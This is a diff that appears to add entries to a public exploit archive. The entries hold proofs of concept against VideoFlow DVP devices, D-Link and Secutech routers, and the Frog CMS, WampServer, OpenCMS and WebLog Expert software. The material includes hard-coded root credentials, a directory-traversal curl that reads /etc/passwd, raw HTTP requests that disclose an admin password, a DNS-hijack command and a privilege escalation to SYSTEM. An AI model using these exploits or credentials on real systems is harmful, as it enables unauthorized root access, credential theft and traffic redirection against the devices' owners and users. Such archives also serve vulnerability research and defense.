diff --git a/exploits/hardware/webapps/44387.txt b/exploits/hardware/webapps/44387.txt
new file mode 100644
index 000000000..873d578bf
--- /dev/null
+++ b/exploits/hardware/webapps/44387.txt
@@ -0,0 +1,91 @@
+VideoFlow Digital Video Protection DVP 10 Authenticated Root Remote Code Execution
+
+Vendor: VideoFlow Ltd.
+Product web page: http://www.video-flow.com
+Affected version: 2.10 (X-Prototype-Version: 1.6.0.2)
+
+System = Indicate if the DVP is configured as Protector, Sentinel or Fortress
+Version = The Operating System SW version number
+Image version = Production Image version
+
+ System: DVP Protector
+ Version: 1.40.0.15(R) May 5 2015 05:27:05
+ Image version: 3.07i
+
+ System: DVP Protector
+ Version: 1.40.0.15(R) May 5 2015 05:27:05
+ Image version: 2.08
+
+ System: DVP Fortress
+ Version: 2.10.0.5(R) Jan 7 2018 03:26:35
+ Image version: 3.07
+
+
+Summary: VideoFlow's Digital Video Protection (DVP) product is used by
+leading companies worldwide to boost the reliability of IP networks, including
+the public Internet, for professional live broadcast. DVP enables broadcast
+companies to confidently contribute and distribute live video over IP with
+unprecedented levels of service continuity, at a fraction of the cost of
+leased lines or satellite links. It accelerates ROI by reducing operational
+costs and enabling new revenue streams across a wide variety of markets.
+
+Desc: The affected device suffers from authenticated remote code execution
+vulnerability. Including a CSRF, a remote attacker can exploit this issue
+and execute arbitrary system commands granting her system access with root
+privileges.
+
+Tested on: CentOS release 5.6 (Final) (2.6.18-238.12.1.el5)
+ CentOS release 5.10 (Final) (2.6.18-371.el5)
+ ConfD
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2018-5455
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5455.php
+
+01.02.2018
+
+---
+
+
+Default credentials (web management):
+
+admin:admin
+oper:oper
+private:private
+public:public
+devel:devel
+
+
+Hard-Coded credentials (ssh):
+
+root:videoflow
+mom:$1$CGgdGXXG$0FmyyKMzcHgkKnUTZi5r./
+
+
+-------------------------------- > Tools > System > Shell > --------------------------------
+| |
+| sh-3.2# id;pwd;uname -a;ls |
+| uid=0(root) gid=0(root) |
+| /dvp100/confd |
+| Linux localhost.localdomain 2.6.18-371.el5 #1 SMP Tue Oct 1 08:37:57 EDT 2013 i6 |
+| 86 i686 i386 GNU/Linux |
+| aaa_cdb.fxs ietf-inet-types.fxs SNMP-USER-BASED-SM-MIB.fxs |
+| authorization.fxs ietf-yang-types.fxs SNMPv2-MIB.fxs |
+| browser.log IF-MIB.bin SNMPv2-SMI.fxs |
+| community_init.xml IF-MIB.fxs SNMPv2-TC.fxs |
+| confd.conf IPV6-TC.fxs SNMP-VIEW-BASED-ACM-MIB.fxs |
+| config.web Makefile TRANSPORT-ADDRESS-MIB.fxs |
+| docroot SNMP-COMMUNITY-MIB.fxs users.fxs |
+| dvp.fxs SNMP-FRAMEWORK-MIB.fxs vacm_init.xml |
+| dvp_init.xml SNMP-MPD-MIB.fxs webspec.dat |
+| IANAifType-MIB.bin SNMP-NOTIFICATION-MIB.fxs |
+| IANAifType-MIB.fxs SNMP-TARGET-MIB.fxs |
+| sh-3.2# cat /etc/issue |
+| CentOS release 5.10 (Final) |
+| Kernel \r on an \m |
+| |
+--------------------------------------------------------------------------------------------
\ No newline at end of file
diff --git a/exploits/hardware/webapps/44388.txt b/exploits/hardware/webapps/44388.txt
new file mode 100644
index 000000000..5a67c8504
--- /dev/null
+++ b/exploits/hardware/webapps/44388.txt
@@ -0,0 +1,179 @@
+# Exploit Title: DLink DIR-601 Unauthenticated Admin password disclosure
+# Google Dork: N/A
+# Date: 12/24/2017
+# Exploit Author: Kevin Randall
+# Vendor Homepage: https://www.dlink.com
+# Software Link: N/A
+# Version: Firmware: 2.02NA Hardware Version B1
+# Tested on: Windows 10 + Mozilla Firefox
+# CVE : CVE-2018-5708
+
+*Been in contact with William Brown CISO of Dlink and disclosed to the vendor*
+
+1. Description
+
+Having local access to the network but being unauthenticated to the administrator panel, a user can disclose the built in Admin username/password to access the admin panel
+
+
+2. Proof of Concept
+(For proof of concept, the real Admin password is "thisisatest"
+Step 1: Access default gateway/router login page
+
+Step 2: Login with Username Admin and put any random password: (This example the password is test)
+
+POST /my_cgi.cgi?0.06201226210472943 HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Referer: http://192.168.0.1/login_real.htm
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 74
+DNT: 1
+Connection: close
+
+request=login&admin_user_name=YWRtaW4A&admin_user_pwd=dGVzdA==&user_type=0
+
+Step 3: Clear Password that was set:
+
+POST /my_cgi.cgi?0.06201226210472943 HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Referer: http://192.168.0.1/login_real.htm
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 74
+DNT: 1
+Connection: close
+
+request=login&admin_user_name=YWRtaW4A&admin_user_pwd=&user_type=0
+
+
+Step 4: The following POST request will come back or a variant:
+
+POST /my_cgi.cgi?0.322727424911867 HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Referer: http://192.168.0.1/back.htm
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 73
+DNT: 1
+Connection: close
+
+request=no_auth&request=load_settings&table_name=fw_ver&table_name=hw_ver
+
+Change the request=no_auth to "request=auth"
+
+
+POST /my_cgi.cgi?0.322727424911867 HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Referer: http://192.168.0.1/back.htm
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 73
+DNT: 1
+Connection: close
+
+request=auth&request=load_settings&table_name=fw_ver&table_name=hw_ver
+
+Step 5: Forward the request:
+
+
+
+Step 6: Forward the following request:
+
+POST /my_cgi.cgi?0.8141419425197141 HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Referer: http://192.168.0.1/back.htm
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 20
+DNT: 1
+Connection: close
+
+request=show_message
+
+
+Step 7: You will then be presented with the following: "Invalid user name or password, please try again"
+
+Step 8: Click Continue
+
+
+
+Step 9: You will see a POST request come back similar to the following:
+
+POST /my_cgi.cgi?0.12979015154204587 HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Referer: http://192.168.0.1/login.htm
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 68
+DNT: 1
+Connection: close
+
+request=no_auth&request=load_settings&table_name=get_restore_default
+
+Step 10: Change the parameters "request=no_auth" to "request=auth" and "table_name=get_restore_default" to "table_name=restore_default"
+
+POST /my_cgi.cgi?0.12979015154204587 HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Referer: http://192.168.0.1/login.htm
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 68
+DNT: 1
+Connection: close
+
+request=auth&request=load_settings&table_name=restore_default
+
+
+Step 11: Forward the request:
+
+Step 12: You will see the following POST request come back or a variant of it:
+
+POST /my_cgi.cgi?0.5566044428265032 HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Referer: http://192.168.0.1/wizard_default.htm
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 278
+DNT: 1
+Connection: close
+
+request=no_auth&request=load_settings&table_name=get_restore_default&table_name=wan_settings&table_name=wan_static&table_name=wan_pppoe&table_name=wan_pptp&table_name=wan_l2tp&table_name=wireless_settings&table_name=admin_user&table_name=time&table_name=fw_ver&table_name=hw_ver
+
+
+Step 13: In BurpSuite, right click on the POST request and choose: "Do Intercept" "Response from this request":
+
+
+Step 14: In XML cleartext, configuration information is obtained including the Admin username and password "thisisatest"
+
+
+HTTP/1.1 200 OK
+Content-type: text/xml
+Connection: close
+Date: Sat, 06 Jan 2018 13:33:26 GMT
+Server: lighttpd/1.4.28
+Content-Length: 2414
+
+0044:8a:5b:8d:ba:1310.0.0.00.0.0.00.0.0.0150000.0.0.0on_demand300149200.0.0.00.0.0.00.0.0.0on_demand300140000.0.0.00.0.0.00.0.0.0on_demand30014001AlwaysHomeAP3011gn01adminthisisatest12.02NA01Tue, 11 Nov 2014NAB1
+
+
+
+
+
+3. Solution:
+N/A. Unknown as of the moment
\ No newline at end of file
diff --git a/exploits/hardware/webapps/44393.sh b/exploits/hardware/webapps/44393.sh
new file mode 100755
index 000000000..22f446a6e
--- /dev/null
+++ b/exploits/hardware/webapps/44393.sh
@@ -0,0 +1,62 @@
+#
+#
+# Secutech RiS-11/RiS-22/RiS-33 V5.07.52_es_FRI01
+# Remote DNS Change PoC
+#
+# Copyright 2018 (c) Todor Donev
+# https://ethical-hacker.org/
+# https://facebook.com/ethicalhackerorg
+#
+#
+# Once modified, systems use foreign DNS servers, which are
+# usually set up by cybercriminals. Users with vulnerable
+# systems or devices who try to access certain sites are
+# instead redirected to possibly malicious sites.
+#
+# Modifying systems' DNS settings allows cybercriminals to
+# perform malicious activities like:
+#
+# o Steering unknowing users to bad sites:
+# These sites can be phishing pages that
+# spoof well-known sites in order to
+# trick users into handing out sensitive
+# information.
+#
+# o Replacing ads on legitimate sites:
+# Visiting certain sites can serve users
+# with infected systems a different set
+# of ads from those whose systems are
+# not infected.
+#
+# o Controlling and redirecting network traffic:
+# Users of infected systems may not be granted
+# access to download important OS and software
+# updates from vendors like Microsoft and from
+# their respective security vendors.
+#
+# o Pushing additional malware:
+# Infected systems are more prone to other
+# malware infections (e.g., FAKEAV infection).
+#
+# Disclaimer:
+# This or previous programs is for Educational
+# purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the
+# fact that Todor Donev is not liable for any
+# damages caused by direct or indirect use of the
+# information or functionality provided by these
+# programs. The author or any Internet provider
+# bears NO responsibility for content or misuse
+# of these programs or any derivatives thereof.
+# By using these programs you accept the fact
+# that any damage (dataloss, system crash,
+# system compromise, etc.) caused by the use
+# of these programs is not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk!
+#
+#
+
+
+GET -H "Cookie: admin:language=en; path=/" "http:///goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=&DS2=" 2>/dev/null
\ No newline at end of file
diff --git a/exploits/perl/webapps/44386.txt b/exploits/perl/webapps/44386.txt
new file mode 100644
index 000000000..e7849be95
--- /dev/null
+++ b/exploits/perl/webapps/44386.txt
@@ -0,0 +1,108 @@
+VideoFlow Digital Video Protection DVP 10 Authenticated Directory Traversal
+
+Vendor: VideoFlow Ltd.
+Product web page: http://www.video-flow.com
+Affected version: 2.10 (X-Prototype-Version: 1.6.0.2)
+
+System = Indicate if the DVP is configured as Protector, Sentinel or Fortress
+Version = The Operating System SW version number
+Image version = Production Image version
+
+ System: DVP Protector
+ Version: 1.40.0.15(R) May 5 2015 05:27:05
+ Image version: 3.07i
+
+ System: DVP Protector
+ Version: 1.40.0.15(R) May 5 2015 05:27:05
+ Image version: 2.08
+
+ System: DVP Fortress
+ Version: 2.10.0.5(R) Jan 7 2018 03:26:35
+ Image version: 3.07
+
+
+Summary: VideoFlow's Digital Video Protection (DVP) product is used by
+leading companies worldwide to boost the reliability of IP networks, including
+the public Internet, for professional live broadcast. DVP enables broadcast
+companies to confidently contribute and distribute live video over IP with
+unprecedented levels of service continuity, at a fraction of the cost of
+leased lines or satellite links. It accelerates ROI by reducing operational
+costs and enabling new revenue streams across a wide variety of markets.
+
+Desc: The application suffers from an authenticated arbitrary file disclosure
+vulnerability including no session expiration. Input passed via the 'ID' parameter
+in several Perl scripts is not properly verified before being used to download
+system files. This can be exploited to disclose the contents of arbitrary
+files via directory traversal attacks.
+
+Scripts affected:
+
+$ grep -rnH "Content-Disposition" .
+./download.pl:30: print "Content-Disposition:attachment;filename=$ID\n\n";
+./download_xml.pl:23: print "Content-Disposition:attachment;filename=$ID\n\n";
+./downloadmib.pl:22: print "Content-Disposition:attachment;filename=$ID\n\n";
+./downloadFile.pl:30: print "Content-Disposition:attachment;filename=$OUTNAME\n\n";
+./downloadsys.pl:22: print "Content-Disposition:attachment;filename=$ID\n\n";
+
+----------------------------------------------------------------------------
+/dvp100/confd/docroot/cgi-bin/downloadsys.pl:
+---------------------------------------------
+
+ 1 #!/usr/bin/perl -wT
+ 2 # http://www.sitepoint.com/file-download-script-perl/
+ 3
+ 4 use strict;
+ 5 use CGI;
+ 6 use CGI::Carp qw ( fatalsToBrowser );
+ 7 my $files_location;
+ 8 my $query = CGI->new;
+ 9 my $ID = $query->param('ID');
+ 10 my @fileholder;
+ 11
+ 12 $files_location = "/dvp100/confd/docroot/cgi-bin/";
+ 13 #$ID = "syslog.tar.gz"; #param('ID');
+ 14
+ 15 if ($ID eq '') {
+ 16
+ 17 } else {
+ 18 open(DLFILE, "<$files_location/$ID") || Error('open', 'file');
+ 19 @fileholder = ;
+ 20 close (DLFILE) || Error ('close', 'file');
+ 21 print "Content-Type:application/x-download\n";
+ 22 print "Content-Disposition:attachment;filename=$ID\n\n";
+ 23 print @fileholder;
+ 24 }
+
+----------------------------------------------------------------------------
+
+Tested on: CentOS release 5.6 (Final) (2.6.18-238.12.1.el5)
+ CentOS release 5.10 (Final) (2.6.18-371.el5)
+ ConfD
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2018-5454
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5454.php
+
+01.02.2018
+
+---
+
+
+curl 'http://17.17.17.17/cgi-bin/downloadsys.pl?ID=../../../../etc/passwd' -H Cookie:sessionid=sess3638473331458218
+root:x:0:0:root:/root:/bin/bash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+adm:x:3:4:adm:/var/adm:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+news:x:9:13:news:/etc/news:
+uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
+...
+...
\ No newline at end of file
diff --git a/exploits/php/webapps/44383.html b/exploits/php/webapps/44383.html
new file mode 100644
index 000000000..3c9fd6bd2
--- /dev/null
+++ b/exploits/php/webapps/44383.html
@@ -0,0 +1,58 @@
+# Exploit Title: Cross Site Request Forgery- Frog CMS
+# Date: 31-03-2018
+# Exploit Author: Samrat Das
+# Contact: http://twitter.com/Samrat_Das93
+# Website: https://securitywarrior9.blogspot.in/
+# Vendor Homepage: https://github.com/philippe/FrogCMS
+# Version: 0.9.5
+# CVE : CVE-2018-8908
+# Category: Webapp CMS
+
+
+1. Description
+
+The application source code is coded in a way which allows malicious HTML
+request to be executed without veryifying source of request.This leads to
+arbitary execution with malicous request which will lead to the creation of
+a privileged user.
+
+2. Proof of Concept
+
+ Visit the application
+ Visit the Add Users Page.
+ Craft an html page with all the details for an admin user creation
+and host it on a server
+ Upon the link being clicked by a logged in admin user, immidiately,
+another admin user will get created.
+
+Exploit Code:
+
+
+
+
+
+
+
+
+3. Solution:
+
+Solution - Fix & Patch: The application code should be configured to
+implement anti csrf token to filter malicous HTTP Requests.
+
+
+4. Public Reference with POC and steps:
+
+http://securitywarrior9.blogspot.in/2018/03/cross-site-request-forgery-frog-cms-cve.html
+
+Thanks and Regards
+Samrat
\ No newline at end of file
diff --git a/exploits/php/webapps/44384.txt b/exploits/php/webapps/44384.txt
new file mode 100644
index 000000000..06c4e0cd7
--- /dev/null
+++ b/exploits/php/webapps/44384.txt
@@ -0,0 +1,51 @@
+ # Exploit Title: WampServer 3.1.1 XSS via CSRF
+# Date: 31-03-2018
+# Software Link: http://www.wampserver.com/en/
+# Version: 3.1.1
+# Tested On: Windows 10
+# Exploit Author: Vipin Chaudhary
+# Contact: http://twitter.com/vipinxsec
+# Website: http://medium.com/@vipinxsec
+# CVE: CVE-2018-8732
+
+
+1. Description
+
+XSS: cross site scripting via CSRF is remotely exploitable.
+http://forum.wampserver.com/read.php?2,138295,150615,page=6#msg-150615
+
+http://forum.wampserver.com/read.php?2,150617
+
+2. Proof of Concept
+
+
+How to exploit this XSS vulnerability:
+1. Go to Add a Virtual host and add one to wampserver.
+2. Go to Supress Virtual host and select one to delete and then intercept
+the request using burp suite or any other proxy tool
+3. Change the value of parameter *virtual_del[] *to "> and forward it then you will see the XSS triggered.
+
+How to see it:
+1. Copy and paste this CSRF request in notepad and save it as anything.html
+
+
+
+
+
+
+Warning: action="[localhost] is action='
+http://localhost/add_vhost.php?lang=english' replacing simple quotes(') by
+double quote("[image: winking smiley]
+
+
+3. Solution:
+
+Update to version 3.1.3
+http://www.wampserver.com/en/#download-wrapper
\ No newline at end of file
diff --git a/exploits/php/webapps/44385.html b/exploits/php/webapps/44385.html
new file mode 100644
index 000000000..defe8a9ab
--- /dev/null
+++ b/exploits/php/webapps/44385.html
@@ -0,0 +1,47 @@
+# Exploit Title: WampServer 3.1.2 CSRF to add or delete any virtual hostsremotely
+# Date: 31-03-2018
+# Software Link: http://www.wampserver.com/en/
+# Version: 3.1.2
+# Tested On: Windows 10
+# Exploit Author: Vipin Chaudhary
+# Contact: http://twitter.com/vipinxsec
+# Website: http://medium.com/@vipinxsec
+# CVE: CVE-2018-8817
+
+
+1. Description
+
+CSRF (Cross site request forgery) in WampServer 3.1.2 which allows a remote
+attacker to force any victim to add or delete virtual hosts.
+
+http://forum.wampserver.com/read.php?2,138295,150722,page=6#msg-150722
+
+2. Proof of Concept
+
+How to exploit this CSRF vulnerability:
+1. Go to Add a Virtual host and add one to wampserver.
+2. Now intercept the request with proxy tool like burp suite.
+3. Now make a CSRF PoC of the request and to exploit you can host it on
+internet and send the link to the victim.
+
+*Exploit Code for deleting any host remotely:*
+
+1. Copy and paste this CSRF request in notepad and save it as anything.html
+
+
+
+
+
+
+2. Then run it on your installed vulnerable wampserver.
+
+3. Solution:
+
+Update to version 3.1.3
+http://www.wampserver.com/en/#download-wrapper
\ No newline at end of file
diff --git a/exploits/php/webapps/44391.html b/exploits/php/webapps/44391.html
new file mode 100644
index 000000000..5fc09a7f5
--- /dev/null
+++ b/exploits/php/webapps/44391.html
@@ -0,0 +1,73 @@
+# Exploit Title: OpenCMS 10.5.3 Multiple Cross Site Request Forgery Vulnerabilities
+Injection
+# Google Dork: N/A
+# Date: 02-04-2018
+#######################################
+# Exploit Author: Sureshbabu Narvaneni
+# Author Blog : http://nullnews.in
+# Vendor Homepage: http://www.opencms.org/en/
+# Software Link: http://www.opencms.org/en/modules/downloads/begindownload.html?id=a7747cd0-b27b-11e7-8299-7fde8b0295e1
+# Affected Version: 10.5.3
+# Category: WebApps
+# Tested on: Ubuntu 14.04 x86_64/Kali Linux 4.12 i686
+# CVE : CVE-2018-8811
+
+1. Vendor Description:
+
+OpenCms from Alkacon Software is a professional, easy to use website content management system. OpenCms helps content managers worldwide to create and maintain beautiful websites fast and efficiently.
+
+2. Technical Description:
+
+Cross-site request forgery (CSRF) vulnerability in system/workplace/admin/accounts/user_role.jsp in OpenCMS 10.5.3 allows remote attackers to hijack the authentication of administrative users for requests that perform privilege escalation.
+
+3. Proof Of Concept:
+
+a) Send below crafted request to logged in user who is having Root Administrator level access.
+
+
+
+
+
+
+
+
+b) Once the logged in user opens the URL the form will get submitted with active session of root administrator and action get performed successfully.
+
+c) By leveraging this vulnerability user can gain Root Level Administrator Access to the CMS.
+
+
+4. Solution:
+
+Upgrade to latest release.
+http://www.opencms.org/en/home/news.html
+
+5. Reference:
+https://github.com/alkacon/opencms-core/issues/586
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-8811
\ No newline at end of file
diff --git a/exploits/php/webapps/44392.txt b/exploits/php/webapps/44392.txt
new file mode 100644
index 000000000..449624ad2
--- /dev/null
+++ b/exploits/php/webapps/44392.txt
@@ -0,0 +1,51 @@
+# Exploit Title: OpenCMS 10.5.3 Stored Cross Site Scripting Vulnerability
+# Google Dork: N/A
+# Date: 02-04-2018
+#######################################
+# Exploit Author: Sureshbabu Narvaneni
+# Author Blog : http://nullnews.in
+# Vendor Homepage: http://www.opencms.org/en/
+# Software Link: http://www.opencms.org/en/modules/downloads/begindownload.html?id=a7747cd0-b27b-11e7-8299-7fde8b0295e1
+# Affected Version: 10.5.3
+# Category: WebApps
+# Tested on: Ubuntu 14.04 x86_64/Kali Linux 4.12 i686
+# CVE : CVE-2018-8815
+
+1. Vendor Description:
+
+OpenCms from Alkacon Software is a professional, easy to use website
+content management system. OpenCms helps content managers worldwide to
+create and maintain beautiful websites fast and efficiently.
+
+2. Technical Description:
+
+Cross-site scripting (XSS) vulnerability in the gallery function in Alkacon
+OpenCMS 10.5.3 allows remote attackers to inject arbitrary web script or
+HTML via a malicious SVG image.
+
+3. Proof Of Concept:
+
+a) Login as user who is having Gallery Editor role.
+b) Navigate to gallery and upload below svg file.
+
+
+
+
+c) Once other user who is having Root Administrator permissions visited the
+image link or viewed the uploaded svg image the script get executed.
+
+4. Solution:
+
+Upgrade to latest release.
+http://www.opencms.org/en/home/news.html
+
+5. Reference:
+https://github.com/alkacon/opencms-core/issues/587
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-8815
\ No newline at end of file
diff --git a/exploits/windows/local/44382.py b/exploits/windows/local/44382.py
index 64a4dc85a..b026006a7 100755
--- a/exploits/windows/local/44382.py
+++ b/exploits/windows/local/44382.py
@@ -16,7 +16,6 @@ After hitting enter new device, click Enter device manually
#!/usr/bin/python
import socket
-# Create an array of buffers, from 1 to 5900, with increments of 200.
calc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
diff --git a/exploits/windows/local/44389.txt b/exploits/windows/local/44389.txt
new file mode 100644
index 000000000..5985915f7
--- /dev/null
+++ b/exploits/windows/local/44389.txt
@@ -0,0 +1,49 @@
+Exploit Author: bzyo
+Twitter: @bzyo_
+Exploit Title: WebLog Expert Enterprise 9.4 - Privilege Escalation
+Date: 03-31-2018
+Vulnerable Software: WebLog Expert Enterprise 9.4
+Vendor Homepage: https://www.weblogexpert.com/
+Version: 9.4
+Software Link: https://www.weblogexpert.com/download.htm
+Tested On: Windows 7 x86 and x64
+
+
+Details:
+By default WebLog Expert Enterprise 9.4 runs scheduled tasks under Local System account.
+If WebLog Expert Schedule Service is installed by an administrator, regular users have the
+ability to run tasks as Local System.
+
+
+Exploit:
+1. Login as regular user where WebLog Expert and WebLog Expert Schedule Service are installed
+
+2. Open WebLog Expert and then Schedule
+
+3. Select Add, Next, choose 'Sample - HTML' under Profile, Next
+
+4. Check 'Run command...' box, fill in 'Command' and 'Run in' as listed below
+ Command: C:\Windows\System32\cmd.exe
+ Run in: C:\Windows\System32\
+
+5. Select Next, Finish, Highlight New Task, select Run Now
+
+6. Pop-up will appear in taskbar that reads 'A program running on this computer is trying to display a message'
+
+7. Select 'View the message'
+
+8. Command prompt is shown
+ C:\Windows\system32>whoami
+ nt authority\system
+
+Prerequisites:
+To successfully exploit this vulnerability, an attacker must already have access
+to a system running WebLog Expert and WebLog Expert Schedule Service using a
+low-privileged user account
+
+Risk:
+The vulnerability allows local attackers to escalate privileges and execute
+arbitrary code as Local System aka Game Over.
+
+Fix:
+Under Schedule Options, change default account that runs scheduled tasks
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index c88125e92..6091a6dfd 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -9626,6 +9626,7 @@ id,file,description,date,author,type,platform,port
44364,exploits/windows/local/44364.py,"Allok Video Joiner 4.6.1217 - Stack-Based Buffer Overflow",2018-03-30,"Mohan Ravichandran and Velayutham Selvaraj",local,windows,
44365,exploits/windows/local/44365.py,"Allok WMV to AVI MPEG DVD WMV Converter 4.6.1217 - Buffer Overflow",2018-03-30,"Mohan Ravichandran and Velayutham Selvaraj",local,windows,
44382,exploits/windows/local/44382.py,"Faleemi Windows Desktop Software - (DDNS/IP) Local Buffer Overflow",2018-03-30,"Himavanth Reddy",local,windows,
+44389,exploits/windows/local/44389.txt,"WebLog Expert Enterprise 9.4 - Privilege Escalation",2018-04-02,bzyo,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39079,6 +39080,15 @@ id,file,description,date,author,type,platform,port
44374,exploits/php/webapps/44374.py,"osCommerce 2.3.4.1 - Remote Code Execution",2018-03-30,"Simon Scannell",webapps,php,
44377,exploits/asp/webapps/44377.txt,"Tenda W316R Wireless Router 5.07.50 - Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp,
44378,exploits/php/webapps/44378.txt,"D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router - Authentication Bypass",2018-03-30,"Gem George",webapps,php,
-44381,exploits/asp/webapps/44381.txt,"Tenda FH303/A300 Firmware V5.07.68_EN - Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp,
+44381,exploits/asp/webapps/44381.txt,"Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp,
44379,exploits/php/webapps/44379.rb,"Vtiger CRM 6.3.0 - Authenticated Arbitrary File Upload (Metasploit)",2018-03-30,"Touhid M.Shaikh",webapps,php,
-44380,exploits/asp/webapps/44380.txt,"Tenda W3002R/A302/w309r Wireless Router V5.07.64_en - Remote DNS Change (PoC)",2018-03-30,"Todor Donev",webapps,asp,
+44380,exploits/asp/webapps/44380.txt,"Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC)",2018-03-30,"Todor Donev",webapps,asp,
+44383,exploits/php/webapps/44383.html,"Frog CMS 0.9.5 - Cross-Site Request Forgery (Add User)",2018-04-02,"Samrat Das",webapps,php,
+44384,exploits/php/webapps/44384.txt,"WampServer 3.1.1 - Cross-Site Scripting / Cross-Site Request Forgery",2018-04-02,"Vipin Chaudhary",webapps,php,
+44385,exploits/php/webapps/44385.html,"WampServer 3.1.2 - Cross-Site Request Forgery",2018-04-02,"Vipin Chaudhary",webapps,php,
+44386,exploits/perl/webapps/44386.txt,"VideoFlow Digital Video Protection (DVP) 2.10 - Directory Traversal",2018-04-02,LiquidWorm,webapps,perl,
+44387,exploits/hardware/webapps/44387.txt,"VideoFlow Digital Video Protection (DVP) 2.10 - Hard-Coded Credentials",2018-04-02,LiquidWorm,webapps,hardware,
+44388,exploits/hardware/webapps/44388.txt,"DLink DIR-601 - Admin Password Disclosure",2018-04-02,"Kevin Randall",webapps,hardware,
+44391,exploits/php/webapps/44391.html,"OpenCMS 10.5.3 - Cross-Site Request Forgery",2018-04-02,"Sureshbabu Narvaneni",webapps,php,
+44392,exploits/php/webapps/44392.txt,"OpenCMS 10.5.3 - Cross-Site Scripting",2018-04-02,"Sureshbabu Narvaneni",webapps,php,
+44393,exploits/hardware/webapps/44393.sh,"Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change",2018-04-02,"Todor Donev",webapps,hardware,